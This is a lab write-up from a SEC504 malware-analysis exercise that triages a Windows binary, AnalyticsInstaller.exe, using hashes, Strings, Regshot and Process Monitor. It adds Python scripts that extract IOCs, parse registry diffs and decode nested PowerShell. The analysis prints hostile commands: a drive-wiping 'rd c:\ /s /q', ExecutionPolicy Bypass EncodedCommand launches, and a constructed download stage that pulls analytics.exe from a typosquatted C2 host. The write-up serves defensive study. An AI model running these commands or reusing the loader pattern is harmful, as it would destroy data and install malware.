SEC504 - Hacker Tools, Techniques, and Incident Handling
Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe
Solo, Lab
Focus: Malware Analysis
Level: SEC504
Date: May 2026
Artifacts: Sanitized PowerShell, Sysinternals Strings, Regshot, and Process Monitor screenshots from a SEC504 Windows analysis VM
TL;DR
- Static pass: Get-FileHash for IOC pivoting, then Sysinternals Strings exposed a C2 URL, an HKCU Run key, an encoded PowerShell payload, and a wiper batch file (rd c:\ /s /q)
- Dynamic pass: Regshot before/after diff surfaced a new 'Analytics Backup' scheduled-task registry key; Get-ScheduledTask confirmed it
- Process Monitor process tree confirmed AnalyticsInstaller.exe spawning cmd.exe → powershell.exe -EncodedCommand at runtime
Note: Course-provided PCAPs and lab instructions are not shared. Only my own captures and sanitized notes are published.
Why this matters
Most incident responders meet malware as a single unexplained binary on a single endpoint. The skill that matters is extracting maximum intelligence from that one file safely and quickly: a hash for threat-intel pivoting, strings for IOCs you can block today, and a controlled detonation that reveals persistence and child processes you would otherwise miss. This lab is the difference between 'we found a weird .exe' and 'here is its hash, its C2, its persistence mechanism, and the destructive payload it was staged to run.'
Context
This lab walks the SEC504 triage workflow for an unknown Windows binary (AnalyticsInstaller.exe) using a fast static pass followed by a controlled dynamic detonation. Static analysis fingerprints the file with a hash and pulls human-readable strings to surface embedded URLs, persistence paths, and an encoded PowerShell payload. Dynamic analysis uses Regshot to diff the registry before and after execution and Process Monitor to capture the live process tree, confirming that the installer drops a scheduled task and launches an encoded PowerShell child process.
Steps taken
1. Hash the sample
Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.
$ Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe
$ Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe
-Algorithm MD5/SHA256: choose the digest
Default output: Algorithm, Hash, Path
2. Pull readable strings
Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.
$ C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe
-n 10: minimum string length of 10 to cut noise
Strings dumps both ANSI and Unicode by default
3. Read the IOCs from the strings
The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.
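The whole static pass (steps 1 to 3) scripted, as an added example that is not part of the lab or the course material: it reproduces what Get-FileHash and Strings -n 10 gave, scanning for both ASCII and UTF-16LE runs, and tags each hit against the IOC classes found above so the next sample gets the same treatment in one command. The SAMPLE blob is constructed to resemble this sample's strings and is not its real bytes; IOC_PATTERNS and the function names are assumptions of this example.

```python
"""Static triage of an unknown binary: hash it, pull strings, tag IOCs.

Added example, not the lab's own tooling. Re-implements what Get-FileHash and
Sysinternals Strings -n 10 provided, so the static pass can be re-run on the
next sample with: python static_triage.py <file>
"""
import hashlib
import re
import sys

# Constructed stand-in for AnalyticsInstaller.exe (NOT the real sample's bytes):
# header noise, ASCII strings and UTF-16LE strings, each double-NUL terminated
# the way wide strings sit in a real PE.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\xff\xff\x00\x00"
    + b"http://www1-google-analytics.com:8088/analytics.exe\x00\x00"
    + b"C:\\Windows\\System32\\AnalyticsBackup.bat\x00\x00"
    + b"cmd.exe /c rd c:\\ /s /q\x00\x00"
    + b"RegSetValueExW\x00\x00ADVAPI32.dll\x00\x00short\x00\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le")
    + b"\x00\x00"
    + "powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABtAA==".encode("utf-16-le")
    + b"\x00\x00\x01\x02"
)

# IOC classes seen in this lab's strings output; extend for the next sample.
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"'<>]+", re.I),
    "drop_path": re.compile(r"\b[a-z]:\\[^\s\"'<>]+", re.I),
    "run_key": re.compile(r"CurrentVersion\\Run\b", re.I),
    "encoded_powershell": re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]{8,})", re.I),
    "wiper": re.compile(r"\brd\s+[a-z]:\\\s+/s\s+/q\b", re.I),
    "registry_api": re.compile(r"^Reg(?:Open|Set|Create|Delete)\w*"),
}


def file_hashes(data: bytes) -> dict:
    """Uppercase hex digests, the same style Get-FileHash prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA256": hashlib.sha256(data).hexdigest().upper(),
    }


def extract_strings(data: bytes, min_len: int = 10) -> list:
    """Return (offset, kind, text) for printable runs of at least min_len chars.

    kind is 'A' for ASCII and 'U' for UTF-16LE, the two encodings Strings
    dumps by default. Offsets are file offsets, for cross-referencing in a
    hex editor or disassembler.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "A", m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), "U", m.group().decode("utf-16-le")) for m in wide_re.finditer(data)]
    return sorted(found)


def tag_iocs(strings: list) -> dict:
    """Group strings by the IOC class they match; a string may land in several.
    For encoded PowerShell only the base64 blob is kept, ready for decoding."""
    tagged = {name: [] for name in IOC_PATTERNS}
    for _offset, _kind, text in strings:
        for name, pattern in IOC_PATTERNS.items():
            m = pattern.search(text)
            if m:
                tagged[name].append(m.group(1) if m.re.groups else text)
    return tagged


def main(path=None):
    if path:
        with open(path, "rb") as fh:
            data = fh.read()
    else:
        data = SAMPLE
    for algo, digest in file_hashes(data).items():
        print(f"{algo:8} {digest}")
    for name, hits in tag_iocs(extract_strings(data)).items():
        for hit in hits:
            print(f"{name:20} {hit}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with no argument to see the constructed sample triaged, or point it at a real file. The wide-string scan is why a Run-key path stored as UTF-16 still shows up; a plain ASCII-only strings pass would miss it.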
4. Regshot first shot
Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.
5. Detonate and confirm the scheduled task
Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.
$ .\AnalyticsInstaller.exe
$ Get-ScheduledTask
6. Regshot second shot
Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.
7. Compare the snapshots
Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.
8. Read the Regshot diff report
Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task confirmed independently of Get-ScheduledTask, plus the deleted keys/values from normal Windows churn (WER TermReason entries) that a responder learns to ignore.
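Reading the diff mechanically rather than by eye, as an added example that is not part of the lab: this parses a report in Regshot's ~res.txt layout, routes each entry either to a persistence bucket (scheduled-task TaskCache keys, Run keys, services) or to the known baseline churn (WER TermReason), and leaves the rest for manual review. The REPORT text is constructed to mirror what this lab's diff contained; the SID, GUID and key counts in it are invented, and the NOISE list is a starting point you extend from your own VM's baseline.

```python
"""Triage a Regshot comparison report (~res.txt / ~res-x64.txt).

Added example, not part of the lab. Splits the report into its sections and
sorts every entry into persistence hits or known baseline churn, so a
395K-key diff is reduced to the handful of lines a responder must read.
"""
import re
import sys

# Constructed report in Regshot's text layout; entries mirror this lab's
# findings but are not copied from it (SID, GUID and counts are invented).
REPORT = r"""Regshot 1.9.0 x64 Unicode
Comments:
Datetime: 2026/5/1 10:00:00  ,  2026/5/1 10:02:00
Computer: ANALYSIS-VM , ANALYSIS-VM
Username: analyst , analyst

----------------------------------
Keys deleted: 1
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\4120

----------------------------------
Keys added: 3
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D2A7E6F0-1B3C-4D5E-8F90-123456789ABC}
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\5804

----------------------------------
Values added: 2
----------------------------------
HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Analytics Client: "C:\Windows\System32\analytics.exe"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup\Id: "{D2A7E6F0-1B3C-4D5E-8F90-123456789ABC}"

----------------------------------
Total changes: 6
----------------------------------
"""

SECTION_RE = re.compile(r"^(Keys|Values) (added|deleted|modified): (\d+)$")

# Locations whose appearance in a diff almost always means persistence.
PERSISTENCE = {
    "scheduled task": re.compile(r"\\Schedule\\TaskCache\\(?:Tree|Tasks|Plain)\\", re.I),
    "run key": re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\b", re.I),
    "service": re.compile(r"\\CurrentControlSet\\Services\\", re.I),
}

# Baseline churn this lab learned to ignore; grow this from clean detonations.
NOISE = [
    re.compile(r"\\Windows Error Reporting\\", re.I),
]


def parse_regshot(report: str) -> dict:
    """Map each section name ('Keys added', ...) to the list of its entries."""
    sections = {}
    current = None
    for line in report.splitlines():
        line = line.rstrip()
        if not line or line.startswith("-----"):
            continue  # blank lines and separator rules
        m = SECTION_RE.match(line)
        if m:
            current = f"{m.group(1)} {m.group(2)}"
            sections[current] = []
            continue
        if line.startswith("Total changes"):
            current = None
            continue
        if current is not None:
            sections[current].append(line)
    return sections


def triage(sections: dict):
    """Return (suspicious, ignored). suspicious holds (section, category, entry);
    ignored holds (section, entry) for known churn. Everything else is left
    for a manual read and is neither flagged nor discarded."""
    suspicious, ignored = [], []
    for section, entries in sections.items():
        for entry in entries:
            if any(p.search(entry) for p in NOISE):
                ignored.append((section, entry))
                continue
            for category, pattern in PERSISTENCE.items():
                if pattern.search(entry):
                    suspicious.append((section, category, entry))
                    break
    return suspicious, ignored


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else REPORT
    hits, churn = triage(parse_regshot(text))
    for section, category, entry in hits:
        print(f"[{category}] {section}: {entry}")
    print(f"ignored {len(churn)} known-churn entries")
```

Regshot writes its report as UTF-16, hence the encoding argument when reading a real file. The output for the constructed report is four flagged lines (three TaskCache entries and the Run value) and two ignored WER keys, which is the same picture the lab pulled from the diff by hand.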
9. Read the dropped batch payload
Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat. Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive (/s), no-prompt (/q) delete of the whole C: drive tree. Note the path: the strings named C:\Windows\System32\AnalyticsBackup.bat, but the file landed in SysWOW64. That is consistent with WOW64 file-system redirection, which sends a 32-bit process's System32 writes to SysWOW64 (the Procmon capture later shows the child cmd.exe loaded from SysWOW64 as well), so hunt for the file under both directories. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.
$ Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat
10. Filter Process Monitor
Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.
11. Re-detonate under Procmon
Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.
$ .\AnalyticsInstaller.exe
12. Find the Process Create event
Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.
13. Read the encoded PowerShell command line
The Process Create event properties revealed the child image, C:\WINDOWS\SysWOW64\cmd.exe, and its command line: cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes base64 of the UTF-16LE script text, so the real script never appears in plaintext on the command line (it is trivially decodable, and script-block logging records the decoded form), and -ExecutionPolicy Bypass sidesteps script restrictions. This is the runtime confirmation of the encoded-PowerShell technique seen statically in the strings; the blob captured here (AEkAZgBHAG8...) does not begin the way the static JABt... string does, so decode both rather than assuming they are one payload.
14. Reconstruct the process tree
Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer (the analyst's own shell in this lab, not part of the infection chain), started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.
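Steps 12 to 14 and the 'decode the -EncodedCommand offline' follow-up, scripted as an added example that is not part of the lab or the course: it reads a Process Monitor CSV export, pulls each Process Create event with its child PID and command line, and peels -EncodedCommand blobs layer by layer (base64 of UTF-16LE text, possibly wrapping another encoded launch) until plain script remains. The CSV rows, the scripts and the blob are constructed inside the example; they are not the lab's AEkAZgBHAG8... capture, and the PIDs and the download stage are invented.

```python
"""From a Procmon Process Create event to the decoded PowerShell stage.

Added example, not the lab's capture. Parses a Procmon CSV export
(File > Save > CSV), extracts Process Create events, then decodes nested
-EncodedCommand blobs. Handles the two ways a pasted blob goes wrong:
missing '=' padding and a blob truncated mid-character.
"""
import base64
import csv
import io
import re


def encode_command(script: str) -> str:
    """Exactly what PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command. Restores padding lost to copy/paste and
    rejects blobs cut mid-character (odd byte count), which a truncated
    Procmon column or a screenshot transcription will produce."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("truncated UTF-16LE payload: odd number of bytes")
    return raw.decode("utf-16-le")


# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the common ones.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def peel_encoded_layers(command_line: str, max_depth: int = 5) -> list:
    """Decode -EncodedCommand repeatedly: each layer may itself launch
    powershell.exe with another blob. Returns the layers outermost first."""
    layers = []
    current = command_line
    for _ in range(max_depth):
        m = ENCODED_RE.search(current)
        if not m:
            break
        current = decode_command(m.group(1))
        layers.append(current)
    return layers


def process_create_events(csv_text: str) -> list:
    """Parse Procmon's CSV export; the Detail column of a Process Create
    event reads 'PID: <child pid>, Command line: <cmdline>'."""
    detail_re = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)$")
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Process Create":
            continue
        m = detail_re.match(row["Detail"])
        if not m:
            continue
        events.append({
            "parent": row["Process Name"],
            "parent_pid": int(row["PID"]),
            "child_pid": int(m.group(1)),
            "child_image": row["Path"],
            "command_line": m.group(2),
        })
    return events


# Constructed payloads and CSV rows (not the lab's): a download stage wrapped
# in a second encoded layer, the way staged loaders commonly nest.
INNER_SCRIPT = ('Invoke-WebRequest -Uri "http://www1-google-analytics.com:8088/analytics.exe" '
                '-OutFile C:\\Windows\\System32\\analytics.exe')
OUTER_SCRIPT = "powershell.exe -NoProfile -EncodedCommand " + encode_command(INNER_SCRIPT)
PROCMON_CSV = (
    '"Time of Day","Process Name","PID","Operation","Path","Result","Detail"\n'
    '"10:01:02.1234567 AM","AnalyticsInstaller.exe","5804","RegSetValue",'
    '"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Analytics Client",'
    '"SUCCESS","Type: REG_SZ, Length: 70, Data: C:\\Windows\\System32\\analytics.exe"\n'
    '"10:01:02.2345678 AM","AnalyticsInstaller.exe","5804","Process Create",'
    '"C:\\Windows\\SysWOW64\\cmd.exe","SUCCESS",'
    '"PID: 6120, Command line: cmd.exe /c powershell.exe -ExecutionPolicy Bypass '
    '-EncodedCommand ' + encode_command(OUTER_SCRIPT) + '"\n'
)


if __name__ == "__main__":
    for ev in process_create_events(PROCMON_CSV):
        print(f"{ev['parent']} ({ev['parent_pid']}) -> {ev['child_image']} ({ev['child_pid']})")
        for depth, script in enumerate(peel_encoded_layers(ev["command_line"]), 1):
            print(f"  layer {depth}: {script}")
```

The same peel applies to a blob copied out of the strings dump, since -EncodedCommand has no runtime dependency; if decode_command raises on an odd byte count, the blob as captured is truncated and the full command line has to be recovered from the event properties rather than the screenshot.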
Outcome / Lessons learned
Took an unknown Windows binary from 'unexplained .exe' to a full IOC and behavior profile in one sitting. Static analysis gave a hash, a typosquat C2 (www1-google-analytics.com:8088), Run-key persistence, and an encoded PowerShell payload. Dynamic analysis with Regshot proved the 'Analytics Backup' scheduled-task persistence at the registry level, Get-ScheduledTask confirmed the task, the dropped AnalyticsBackup.bat turned out to be a C:-drive wiper, and Process Monitor's process tree caught the cmd.exe → powershell.exe -EncodedCommand execution chain.
Push the SHA256 and the network IOCs (www1-google-analytics.com:8088, midnitemeerkats.com) to EDR block lists and the SIEM watchlist immediately. Hunt the fleet for the 'Analytics Backup' scheduled task, the HKCU/HKLM Run 'Analytics Client' value, and any analytics.exe / AnalyticsBackup.bat on disk. Decode the captured base64 -EncodedCommand offline to recover the real PowerShell stage. Given the wiper payload, prioritize containment over observation: isolate any host showing the persistence before the scheduled task fires.
Security controls relevant
- Application control / WDAC to block unsigned binaries from user-writable paths
- PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
- Scheduled-task and Run-key baselining with alerting on new entries
- EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
- Egress filtering and DNS monitoring for typosquatted analytics domains
- Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload
What I took away from this
Strings is the highest return-on-effort tool in malware triage and it is almost free. Before unpacking, before a sandbox, before a debugger, a thirty-second strings run on this sample handed over the C2 URL, the persistence path, the encoded payload, and the name of the wiper batch file. Plenty of commodity malware never bothers to encrypt its strings because authors assume nobody will look. Look first; you will often be done before the sandbox finishes booting.
Regshot is a poor man's EDR for a controlled detonation and it caught the persistence cleanly. Diffing a 395,000-key registry snapshot against the post-execution state is impossible by hand and trivial for the tool, and the 'Analytics Backup' TaskCache key fell straight out of the diff. The discipline that makes this work is taking the baseline before you detonate, every single time, because you only get one clean 'before.'
The naming was the most instructive part of this sample. 'AnalyticsInstaller', 'Analytics Client', 'Analytics Backup', a typosquat of Google Analytics for C2. Every artifact was named to read as benign telemetry, and the destructive wiper was filed under 'Backup', a word defenders associate with safety. Attackers optimize for the half-second a tired analyst spends reading a name. The defense is mechanical verification: read what the file actually does (rd c:\ /s /q), not what it is called.